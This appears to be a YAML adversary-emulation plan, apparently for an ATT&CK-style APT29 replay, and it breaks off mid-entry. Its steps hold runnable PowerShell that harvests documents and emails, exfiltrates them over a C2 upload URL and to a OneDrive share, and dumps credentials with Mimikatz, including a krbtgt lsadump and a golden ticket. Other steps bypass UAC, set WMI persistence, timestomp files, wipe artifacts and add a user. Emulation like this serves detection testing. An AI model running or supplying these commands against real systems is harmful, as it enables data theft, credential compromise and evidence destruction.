sandcat.go-windows-upx - - input_arguments: - pivot_machine_hostname: - description: Hostname of pivot machine - type: string - default: pivothost - - user.session.id: - description: Session id for user - type: string - default: "1" - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - -- id: 0b1841bd-ef8b-475c-bce7-8fcb2860984a - name: Screen Capture (T1113) - description: Native API call(s) were used to collect a screenshot. - tactic: collection - technique: - attack_id: T1113 - name: "Screen Capture" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_collection - procedure_step: "8.D.1" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\Get-Screenshot.ps1 -Verbose -Force; - Get-Screenshot; - payloads: - - Get-Screenshot.ps1 - - executors: - - name: powershell - command: | - Import-Module .\Get-Screenshot.ps1 -Verbose -Force; - Get-Screenshot; - -# Step 9 - Collection - -- id: d5170a60-3bdc-44e0-9870-a38db5c0cf81 - name: File and Directory Discovery (T1083) - description: PowerShell's Get-ChildItem alias 'ls' is used to enumerate files in a remote file share. - tactic: discovery - technique: - attack_id: T1083 - name: "File and Directory Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "9.A.1" - platforms: - windows: - psh,pwsh: - command: | - ls #{remote.file.share} - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.20 - - executors: - - name: powershell - command: | - ls #{remote.file.share} - -- id: 08e57385-dbce-4850-8bb7-589ef79465ab - name: Automated document collection (T1119) - description: Execute PowerShell collection command to collect and compress files of specific extensions. - tactic: execution - technique: - attack_id: T1059.001 - name: "Command and Scripting Interpreter: PowerShell" - cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" - procedure_group: procedure_execution - procedure_step: "9.B.1" - platforms: - windows: - psh,pwsh: - command: | - move-item Rar.exe -Destination C:\Windows\Temp -Force; - $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force; - cd C:\Windows\Temp; - .\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip"; - payloads: - - rar.exe - - executors: - - name: powershell - command: | - move-item Rar.exe -Destination C:\Windows\Temp -Force; - $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force; - cd C:\Windows\Temp; - .\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip"; - -- id: 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6 - name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) - description: Copy a target file from a remote file share through the existing C2 channel - tactic: exfiltration - technique: - attack_id: T1041 - name: "Exfiltration Over C2 Channel" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_exfiltration - procedure_step: "9.B.8" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload"; - cleanup: | - remove-item upload.ps1 -Force - payloads: - - upload.ps1 - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\Desktop\working.zip" -Uri "#{server}/file/upload"; - cleanup_command: | - remove-item upload.ps1 -Force - -- id: 208b021b-c79a-4176-8ad1-3af99ed50c6f - name: Artifact Cleanup - Delete Staged Files - description: Cleanup files related to Operation - tactic: defensive-evasion - technique: - attack_id: T1070.004 - name: "Indicator Removal on Host: File Deletion" - cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" - procedure_group: procedure_def_evasion - procedure_step: "9.C" - platforms: - windows: - psh,pwsh: - command: | - if (!$(test-path -path "C:\Program Files\SysInternalsSuite")) { - mkdir "C:\Program Files\SysInternalsSuite"; - } - set-location "C:\Program Files\SysInternalsSuite"; - - if (!$(test-path -path "sdelete64.exe")) { - iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip; - Expand-Archive sdelete64.zip -force; - } - copy sdelete64.exe C:\Windows\Temp\; - cd C:\Windows\Temp\ ; - .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe; - .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip; - .\sdelete64.exe /accepteula C:\Users\#{profile_user}\Desktop\working.zip; - remove-item C:\Windows\Temp\sdelete64.exe -force; - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - if (!$(test-path -path "C:\Program Files\SysInternalsSuite")) { - mkdir "C:\Program Files\SysInternalsSuite"; - } - set-location "C:\Program Files\SysInternalsSuite"; - - if (!$(test-path -path "sdelete64.exe")) { - iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip; - Expand-Archive sdelete64.zip -force; - } - copy sdelete64.exe C:\Windows\Temp\; - cd C:\Windows\Temp\ ; - .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe; - .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip; - .\sdelete64.exe /accepteula C:\Users\#{profile_user}\Desktop\working.zip; - remove-item C:\Windows\Temp\sdelete64.exe -force; - -# Step 10 - Persistant Execution - -- id: 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe - name: Scheduled Task - description: Reboot the machine to aid in peristence callbacks - tactic: impact - technique: - attack_id: T1529 - name: "System Shutdown/Reboot" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_impact - procedure_step: "10.A.2" - platforms: - windows: - psh,pwsh: - command: | - write-host "[*] Restarting Computer"; - Restart-Computer -Force; - - executors: - - name: powershell - command: | - write-host "[*] Restarting Computer"; - Restart-Computer -Force; - -- id: 4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92 - name: Artifact Cleanup - description: Delete file artifacts left from the operation. - tactic: defensive-evasion - technique: - attack_id: T1070.004 - name: "Indicator Removal on Host: File Deletion" - cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" - procedure_group: procedure_def_evasion - procedure_step: "10.A.3" - platforms: - windows: - psh,pwsh: - command: | - Remove-Item -Path "$env:USERPROFILE\Downloads\*.pfx" -Force; - Remove-Item -Path "$env:USERPROFILE\Downloads\*.bmp" -Force; - Remove-Item -Path "$env:USERPROFILE\Downloads\*.png" -Force; - if (test-path -path "$env:APPDATA\OfficeSupplies.7z") { - Remove-Item -Path "$env:APPDATA\OfficeSupplies.7z" -Force; write-host "[+] Successfully removed OfficeSupplies.7z"; - } else { - write-host "[!] File did not exist to be removed!"; - } - - if (get-job -name "Keystrokes" -ErrorAction SilentlyContinue) { - Remove-Job -Name "Keystrokes"; - if ($?) { - write-host "[+] Job \"Keystrokes\" was remove."; - } - } else { - write-host "[!] Job \"Keystrokes\" did not exist."; - } - - if (get-job -Name "Screenshot" -ErrorAction SilentlyContinue) { - Remove-Job -Name "Screenshot" -Force; - write-host "[+] Job \"screenshot\" was removed."; - } else { - write-host "[*] Job \"screenshot\" does not exist, thus was not removed."; - } - remove-item upload.ps1 -Force; - - executors: - - name: powershell - command: | - Remove-Item -Path "$env:USERPROFILE\Downloads\*.pfx" -Force; - Remove-Item -Path "$env:USERPROFILE\Downloads\*.bmp" -Force; - Remove-Item -Path "$env:USERPROFILE\Downloads\*.png" -Force; - if (test-path -path "$env:APPDATA\OfficeSupplies.7z") { - Remove-Item -Path "$env:APPDATA\OfficeSupplies.7z" -Force; write-host "[+] Successfully removed OfficeSupplies.7z"; - } else { - write-host "[!] File did not exist to be removed!"; - } - - if (get-job -name "Keystrokes" -ErrorAction SilentlyContinue) { - Remove-Job -Name "Keystrokes"; - if ($?) { - write-host "[+] Job \"Keystrokes\" was remove."; - } - } else { - write-host "[!] Job \"Keystrokes\" did not exist."; - } - - if (get-job -Name "Screenshot" -ErrorAction SilentlyContinue) { - Remove-Job -Name "Screenshot" -Force; - write-host "[+] Job \"screenshot\" was removed."; - } else { - write-host "[*] Job \"screenshot\" does not exist, thus was not removed."; - } - remove-item upload.ps1 -Force; - -- id: 00446217-53ca-4749-bacd-f41fe189d36e - name: Startup Folder Persistence Execution - description: Sets credentials for a headless RDP session to spawn triggering startup folder persistence. - tactic: lateral-movement - technique: - attack_id: T1037.005 - name: "Boot or Logon Initialization Scripts: Startup Items" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_lat_movement - procedure_step: "10.B" - platforms: - windows: - psh,pwsh: - command: | - cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password}; - mstsc /v:127.0.0.2; - sleep 10; - Get-Process -name mstsc; - if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;} - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - profile_user_password: - description: Password of profile user - type: string - default: Password123! - - executors: - - name: powershell - command: | - cmdkey /add:127.0.0.2 /user:#{profile_user} /pass:#{profile_user_password}; - mstsc /v:127.0.0.2; - sleep 10; - Get-Process -name mstsc; - if ($?) { taskkill.exe /F /IM mstsc.exe; exit 0; } else {exit 1;} - -# Scenario 2 - -# Step 11 - Initial Breach - -- id: e506f811-884d-4992-aacb-514b33a0324f - name: Click .LNK payload - description: Execute PowerShell collection command to collect and compress files of specific extensions. - tactic: execution - technique: - attack_id: T1204.002 - name: "User Execution: Malicious File" - cti_source: "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" - procedure_group: procedure_execution - procedure_step: "11.A" - platforms: - windows: - psh,pwsh: - command: | - Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; - - if(Test-Path -LiteralPath "$env:appdata\Microsoft\kxwn.lock"){ - Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; - Write-Host "Removed old kxwn.lock file"; - } - - powershell.exe Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX; - cleanup: | - Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; - - input_arguments: - profile_user_day2: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - Set-Location -Path "C:\Users\#{profile_user_day2}\Desktop"; - - if(Test-Path -LiteralPath "$env:appdata\Microsoft\kxwn.lock"){ - Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; - Write-Host "Removed old kxwn.lock file"; - } - - powershell.exe Get-Content '.\2016_United_States_presidential_election_-_Wikipedia.html' -Stream schemas | IEX; - cleanup_command: | - Remove-Item "$env:appdata\Microsoft\kxwn.lock" -Force; - -# Step 12 - Fortify Access - -- id: 4a2ad84e-a93a-4b2e-b1f0-c354d6a41278 - name: Timestomp kxwn.lock - description: Timestomp kxwn.lock - tactic: defensive-evasion - technique: - attack_id: T1070.006 - name: "Indicator Removal on Host: Timestomp" - cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" - procedure_group: procedure_def_evasion - procedure_step: "12.A" - platforms: - windows: - psh,pwsh: - command: | - if (!(test-path -path "$env:appdata\Microsoft\kxwn.lock")) { - write-host "[!] kxwn.lock was not found on this host."; - exit 1; - } else { - . .\timestomp.ps1; - timestomp -dest "$env:appdata\Microsoft\kxwn.lock"; - } - payloads: - - timestomp.ps1 - - executors: - - name: powershell - command: | - if (!(test-path -path "$env:appdata\Microsoft\kxwn.lock")) { - write-host "[!] kxwn.lock was not found on this host."; - exit 1; - } else { - . .\timestomp.ps1; - timestomp -dest "$env:appdata\Microsoft\kxwn.lock"; - } - -- id: f9c0b150-822f-497b-ad6d-187f24561e9a - name: Detect Anti-Virus - description: Detect anti-virus software on host - tactic: discovery - technique: - attack_id: T1518.001 - name: "Software Discovery: Security Software Discovery" - cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" - procedure_group: procedure_discovery - procedure_step: "12.B" - platforms: - windows: - psh,pwsh: - command: | - . .\stepTwelve.ps1; - detectav - payloads: - - stepTwelve.ps1 - - executors: - - name: powershell - command: | - . .\stepTwelve.ps1; - detectav - -- id: 2b5a72b1-01e4-48ae-98b0-2570a7894371 - name: Detect Software - description: Detect software on host - tactic: discovery - technique: - attack_id: T1518 - name: "Software Discovery" - cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" - procedure_group: procedure_discovery - procedure_step: "12.C" - platforms: - windows: - psh,pwsh: - command: | - . .\stepTwelve.ps1; - software; - payloads: - - stepTwelve.ps1 - - executors: - - name: powershell - command: | - . .\stepTwelve.ps1; - software; - -# Step 13 - Local Enumaration - -- id: 0cfadbcb-ec21-44ae-adb7-9a23176dd620 - name: Enumerate Computer Name - description: Triage host for ComputerNameNetBIOS,ComputerNameDnsHostname,ComputerNameDnsDomain,ComputerNameDnsFullyQualified,ComputerNamePhysicalNetBIOS,ComputerNamePhysicalDnsHostname,ComputerNamePhysicalDnsDomain,ComputerNamePhysical,DnsFullyQualifie - tactic: discovery - technique: - attack_id: T1082 - name: "System Information Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "13.A" - platforms: - windows: - psh,pwsh: - command: | - . .\stepThirteen.ps1; - comp; - payloads: - - stepThirteen.ps1 - - executors: - - name: powershell - command: | - . .\stepThirteen.ps1; - comp; - -- id: 96140694-6d13-40b6-9553-0e63533469f3 - name: Enumerate Domain Name - description: Domain triage - tactic: discovery - technique: - attack_id: T1082 - name: "System Information Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "13.B" - platforms: - windows: - psh,pwsh: - command: | - . .\stepThirteen.ps1; - domain; - payloads: - - stepThirteen.ps1 - - executors: - - name: powershell - command: | - . .\stepThirteen.ps1; - domain; - -- id: f320eebd-e75b-4194-b529-79e64ad0b9ee - name: Enumerate Username - description: user triage - tactic: discovery - technique: - attack_id: T1033 - name: "System Owner/User Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "13.C" - platforms: - windows: - psh,pwsh: - command: | - . .\stepThirteen.ps1; - user; - payloads: - - stepThirteen.ps1 - - executors: - - name: powershell - command: | - . .\stepThirteen.ps1; - user; - -- id: a34ab8f2-a106-41fb-af0b-cf5382bd18ae - name: Enumerate Processes - description: Process triage - tactic: discovery - technique: - attack_id: T1057 - name: "Process Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "13.D" - platforms: - windows: - psh,pwsh: - command: | - . .\stepThirteen.ps1; - pslist; - payloads: - - stepThirteen.ps1 - - executors: - - name: powershell - command: | - . .\stepThirteen.ps1; - pslist; - -# Step 14 - Elevation - -- id: 5226e5dc-fc28-43b7-a679-0db49d520402 - name: UAC Bypass via sdctl - description: Invoke UAC bypass sdctl - tactic: defensive-evasion - technique: - attack_id: T1134.002 - name: "Access Token Manipulation: Create Process with Token" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_def_evasion - procedure_step: "14.A" - platforms: - windows: - psh,pwsh: - command: | - . .\stepFourteen_bypassUAC.ps1; - bypass; - payloads: - - stepFourteen_bypassUAC.ps1 - - executors: - - name: powershell - command: | - . .\stepFourteen_bypassUAC.ps1; - bypass; - -- id: 4ef6009d-2d62-4bb4-8de9-0458df2e9567 - name: Credential Dumping - description: Dumping credentials via wmidump (Mimikatz) - tactic: credential-access - technique: - attack_id: T1003 - name: "Credential Dumping" - cti_source: "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - procedure_group: procedure_cred_access - procedure_step: "14.B" - platforms: - windows: - psh,pwsh: - command: | - . .\stepFourteen_credDump.ps1; - payloads: - - stepFourteen_credDump.ps1 - - executors: - - name: powershell - command: | - . .\stepFourteen_credDump.ps1; - -- id: 1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24 - name: Stage Mimikatz Binary - description: Staging Mimikatz Binary for later execution - tactic: credential-access - technique: - attack_id: T1003 - name: "Credential Dumping" - cti_source: "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - procedure_group: procedure_cred_access - procedure_step: "14.C" - platforms: - windows: - psh,pwsh: - command: | - write-host "[+] Successfully downloaded m.exe"; - payloads: - - m.exe - - executors: - - name: powershell - command: | - write-host "[+] Successfully downloaded m.exe"; - -# Step 15 - Establish Persistence - -- id: 43aad2d6-d16a-4adb-aa2b-9510a3be4c52 - name: WMI Persistence technique - description: user triage - tactic: persistence - technique: - attack_id: T1546.003 - name: "Event Triggered Execution: Windows Management Instrumentation Event Subscription" - cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" - procedure_group: procedure_persistence - procedure_step: "15.A" - platforms: - windows: - psh,pwsh: - command: | - Get-WmiObject -Namespace "root/subscription" -list | findstr /i "__Filter"; - if ($?) { - write-host "[*] WMI script has already executed on this machine. Not loading and executing wmi script."; - exit 1; - } else { - . .\stepFifteen_wmi.ps1; - wmi; - if ($?) { - write-host "[+] WMI script has successfully executed!"; - exit 0; - } - exit 1; - } - payloads: - - stepFifteen_wmi.ps1 - - executors: - - name: powershell - command: | - Get-WmiObject -Namespace "root/subscription" -list | findstr /i "__Filter"; - if ($?) { - write-host "[*] WMI script has already executed on this machine. Not loading and executing wmi script."; - exit 1; - } else { - . .\stepFifteen_wmi.ps1; - wmi; - if ($?) { - write-host "[+] WMI script has successfully executed!"; - exit 0; - } - exit 1; - } - -# Step 16 - Lateral Movement - -- id: 1c8552c7-f7ed-4523-b640-72d65af5f855 - name: Enumerate Domain Controller - description: Get domain controller and current user SID for the domain - tactic: discovery - technique: - attack_id: T1018 - name: "Remote System Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "16.A" - platforms: - windows: - psh,pwsh: - command: | - . .\powerview.ps1; - get-netdomaincontroller; - payloads: - - powerview.ps1 - - executors: - - name: powershell - command: | - . .\powerview.ps1; - get-netdomaincontroller; - -- id: a42be479-fc26-4d7c-9e63-7a9b74e4c8d2 - name: Enumerate Domain SID - description: Get domain user SID - tactic: discovery - technique: - attack_id: T1033 - name: "System Owner/User Discovery" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_discovery - procedure_step: "16.B" - platforms: - windows: - psh,pwsh: - command: | - . .\stepSixteen_SID.ps1; - siduser; - payloads: - - stepSixteen_SID.ps1 - - executors: - - name: powershell - command: | - . .\stepSixteen_SID.ps1; - siduser; - -- id: acecc8f7-18c2-41fd-87bc-39ffd644e4e9 - name: Remote Connection (T1028) & Remote File Copy (T1105) & Credential Dumping - description: Establish connection to Domain Controller - tactic: lateral-movement - technique: - attack_id: T1105 - name: "Ingress Tool Transfer" - cti_source: "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - procedure_group: procedure_lat_movement - procedure_step: "16.C" - platforms: - windows: - psh,pwsh: - command: | - . .\invoke-winrmsession.ps1; - $session = invoke-winrmsession -Username "#{target.winrm.username}" -Password "#{target.winrm.password}" -IPAddress "#{target.winrm.remote_host}"; - Copy-Item m.exe -Destination "C:\Windows\System32\\" -ToSession $session -force; - if ($?) { - write-host "[+] Successfully copied m.exe to remote host"; - } else { - write-host "[!] Error, copying and executing m.exe on remote host"; - } - Invoke-Command -Session $session -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string - - payloads: - - invoke-winrmsession.ps1 - - m.exe - - input_arguments: - target.winrm.username: - description: Username of winrm target - type: string - default: Administrator - - target.winrm.password: - description: Password for winrm target user - type: string - default: Password123! - - target.winrm.remote_host: - description: IP or Hostname of remote host - type: string - default: 192.0.2.20 - - executors: - - name: powershell - command: | - . .\invoke-winrmsession.ps1; - $session = invoke-winrmsession -Username "#{target.winrm.username}" -Password "#{target.winrm.password}" -IPAddress "#{target.winrm.remote_host}"; - Copy-Item m.exe -Destination "C:\Windows\System32\\" -ToSession $session -force; - if ($?) { - write-host "[+] Successfully copied m.exe to remote host"; - } else { - write-host "[!] Error, copying and executing m.exe on remote host"; - } - Invoke-Command -Session $session -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string - -# Step 17 - Collection - -- id: b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c - name: Collect E-mails - description: Perform e-mail collection from custom PowerShell module. - tactic: collection - technique: - attack_id: T1114.001 - name: "Email Collection: Local Email Collection" - cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" - procedure_group: procedure_collection - procedure_step: "17.A" - platforms: - windows: - psh,pwsh: - command: | - . .\stepSeventeen_email.ps1; - Write-Host "Emails Collected"; - payloads: - - stepSeventeen_email.ps1 - - executors: - - name: powershell - command: | - . .\stepSeventeen_email.ps1; - Write-Host "Emails Collected"; - -- id: fc231955-774f-442c-ac0e-e74dfda50c5c - name: Collect Files & Compress Collection - description: Collect a specific document from a target machine. - tactic: collection - technique: - attack_id: T1005 - name: "Data from Local System" - cti_source: "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" - procedure_group: procedure_collection - procedure_step: "17.B" - platforms: - windows: - psh,pwsh: - command: | - try{ - if (!(test-path -path "C:\Windows\Temp\WindowsParentalControlMigration" -ErrorAction Stop)) { - New-Item -Path "C:\Windows\temp\" -Name "WindowsParentalControlMigration" -ItemType "directory" -force; - } - } catch { - write-host "[!] Access is denied. Manually browse to C:\Windows\Temp via Explorer and accept prompt"; - exit 1; - } - - if (! (test-path -path "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML")) { - write-host "[!] Error, MITRE-ATTACK-EVALS.HTML was not found."; - exit 1; - } - Copy-Item "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration" -force; - . .\stepSeventeen_zip.ps1; - zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration; - if ($?) { - write-host "[+] Documents successfully staged for collection."; - } - - payloads: - - stepSeventeen_zip.ps1 - - input_arguments: - profile_user_day2: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - try{ - if (!(test-path -path "C:\Windows\Temp\WindowsParentalControlMigration" -ErrorAction Stop)) { - New-Item -Path "C:\Windows\temp\" -Name "WindowsParentalControlMigration" -ItemType "directory" -force; - } - } catch { - write-host "[!] Access is denied. Manually browse to C:\Windows\Temp via Explorer and accept prompt"; - exit 1; - } - - if (! (test-path -path "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML")) { - write-host "[!] Error, MITRE-ATTACK-EVALS.HTML was not found."; - exit 1; - } - Copy-Item "C:\Users\#{profile_user_day2}\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration" -force; - . .\stepSeventeen_zip.ps1; - zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration; - if ($?) { - write-host "[+] Documents successfully staged for collection."; - } - -# Step 18 - Exfiltration - -- id: 4840d6dd-da13-401a-be46-05db56f4e1e0 - name: Exfiltrate data to OneDrive - description: Transfer data to a OneDrive account - tactic: exfiltration - technique: - attack_id: T1537 - name: "Transfer Data to Cloud Account" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_exfiltration - procedure_step: "18.A" - platforms: - windows: - psh,pwsh: - command: | - $err = $(net use y: #{onedrive.url} /user:#{onedrive.username} "#{onedrive.password}" 2>&1); - if($err -Like "*System error 85*") { - Write-Host "OneDrive net drive is already mounted!"; - } elseif($err -Like "*System error 67*") { - Write-Host "OneDrive net drive mount failed - Check URL!"; - Write-Host "#{onedrive.url}"; - exit 1; - } elseif($err -Like "*System error 1244*") { - Write-Host "Could not authenticate to OneDrive - Check Creds!"; - Write-Host "User: #{onedrive.username}"; - Write-Host "Password: #{onedrive.password}"; - exit 1; - } - - Write-Host "Mount Successful" - Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "y:\WindowsParentalControlMigration.tmp" -Force; - if(!$?){ - exit 1; - } - - Write-Host "Copy Successfull" - exit 0; - - input_arguments: - onedrive.url: - description: URL for OneDrive net drive - type: URL - default: https://contoso-my.sharepoint.com/personal/johnd_contoso_onmicrosoft_com/ - - onedrive.username: - description: Username for OneDrive authentication - type: string - default: Administrator - - onedrive.password: - description: Password for OneDrive authentication - type: string - default: Password123! - - executors: - - name: powershell - command: | - $err = $(net use y: #{onedrive.url} /user:#{onedrive.username} "#{onedrive.password}" 2>&1); - if($err -Like "*System error 85*") { - Write-Host "OneDrive net drive is already mounted!"; - } elseif($err -Like "*System error 67*") { - Write-Host "OneDrive net drive mount failed - Check URL!"; - Write-Host "#{onedrive.url}"; - exit 1; - } elseif($err -Like "*System error 1244*") { - Write-Host "Could not authenticate to OneDrive - Check Creds!"; - Write-Host "User: #{onedrive.username}"; - Write-Host "Password: #{onedrive.password}"; - exit 1; - } - - Write-Host "Mount Successful" - Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "y:\WindowsParentalControlMigration.tmp" -Force; - if(!$?){ - exit 1; - } - - Write-Host "Copy Successfull" - exit 0; - -# Step 19 - Cleanup - -- id: f820b93d-6176-4a72-a138-a70b0b549c49 - name: Data Wiping of staged files - description: Securely delete previously staged files. - tactic: impact - technique: - attack_id: T1561.001 - name: "Disk Wipe: Disk Content Wipe" - cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" - procedure_group: procedure_impact - procedure_step: "19.A" - platforms: - windows: - psh,pwsh: - command: | - . .\wipe.ps1; - wipe "m.exe"; - wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"; - wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"; - payloads: - - wipe.ps1 - - executors: - - name: powershell - command: | - . .\wipe.ps1; - wipe "m.exe"; - wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"; - wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"; - -# Step 20 - Leverage Persistence - -- id: 267bad86-3f06-49f1-9a3e-6522f2a61e7a - name: Execute Invoke-Mimikatz - description: Perfofrm Mimikatz credential collection - tactic: credential-access - technique: - attack_id: T1003 - name: "Credential Dumping" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_cred_access - procedure_step: "20.A.1" - platforms: - windows: - psh,pwsh: - command: | - klist purge; - . .\Invoke-Mimikatz.ps1; - invoke-mimikatz -command "kerberos::golden /domain:#{target.domain.name} /sid:#{target.sid} /rc4:#{target.ntlm} /user:#{target.winrm.username} /ptt"; - klist; - invoke-command -ComputerName scranton -ScriptBlock {net user /add toby "pamBeesly<3"}; - payloads: - - 